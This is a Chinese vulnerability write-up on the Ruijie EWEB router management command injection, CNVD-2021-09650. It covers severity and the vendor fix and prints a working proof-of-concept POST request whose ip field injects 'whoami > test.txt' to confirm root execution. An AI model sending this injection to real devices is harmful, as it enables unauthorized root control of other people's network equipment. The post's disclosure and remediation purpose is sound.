锐捷EWEB网管系统远程命令执行漏洞（CNVD-2021-09650）

发表于2022-10-13|更新于2025-08-27|漏洞篇

|总字数:297|阅读时长:1分钟|浏览量:

0x01 漏洞描述

- 锐捷EWEB网管系统远程命令执行漏洞（CNVD-2021-09650） -

锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权限。

0x02 漏洞等级

威胁级别

高危

中危

低危

0x03 漏洞验证

访问锐捷EWEB网管系统界面，使用BurpSuite工具抓取数据包。

使用POST型数据包检测语句执行whoami命令，并将执行结果保存到test.txt中。

POST /guest_auth/guestIsUp.php
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded

mac=1&ip=127.0.0.1|whoami > test.txt

访问/guest_auth/test.txt文件，获取当前服务器用户权限为ROOT

0x04 漏洞修复

对设备进行系统升级，限定内外网访问设备WEB页面（管理员除外）。
厂商已发布了漏洞修复程序，请及时关注更新：https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/

文章作者: 鸣剑

文章链接: http://www.mkeysafe.com/posts/f0b5f6b9.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源鸣剑Sec！

远程命令执行锐捷

相关推荐

Apache log4j2 远程命令执行漏洞复现（CVE-2021-44228）

Apache Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向目标服务器发送精心构造的恶意数据，触发Log4j2组件解析缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。

GoTTY 未授权远程命令执行漏洞

GoTTY 是一个简单的基于 Go 语言的命令行工具，它可以将终端（TTY）作为 Web 程序共享。GoTTY 的架构是基于 Hterm + Web Socket 的，它能在 Web 浏览器上运行一个基于 Java 的终端，并支持通过 HTTP 和 HTTPS 访问。当 GoTTY 未正确配置身份验证启动时，任意用户可通过 GoTTY 程序的 Web 页面未授权远程命令执行。

Spring Data Commons 远程命令执行漏洞复现（CVE-2018-1273）

Spring Data Commons在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。

数据加载中